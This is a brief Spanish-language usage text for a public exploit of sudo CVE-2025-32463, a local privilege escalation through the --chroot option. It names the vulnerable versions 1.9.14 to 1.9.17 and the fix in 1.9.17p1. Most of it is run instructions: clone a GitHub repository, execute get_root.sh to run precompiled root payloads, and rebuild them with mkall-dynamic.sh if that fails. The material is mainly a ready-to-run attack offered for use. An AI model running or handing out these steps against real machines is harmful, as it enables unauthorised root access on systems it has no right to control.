
- Vulnerable: sudo 1.9.14, 1.9.15, 1.9.16, 1.9.17 - Corregido en: sudo 1.9.17p1 y posteriores - Las versiones heredadas anteriores a 1.9.14 no se ven afectadas, ya que no admiten la opción --chroot.
# get_root.sh y get_root.py hacen lo mismo.
git clone https://github.com/shazed-x/CVE-2025-32463
cd CVE-2025-32463
./get_root.sh
No se requiere gcc en la máquina objetivo. El PoC funciona comprobando la arquitectura actual (por ejemplo, x86_64, aarch64) y luego ejecutando el payload dinámico precompilado correspondiente. Si eso falla, recurre al estático.
Si el exploit falla en tu máquina, aún puedes compilarlo usando:
./mkall-dynamic.sh
# luego ejecuta
./get_root.sh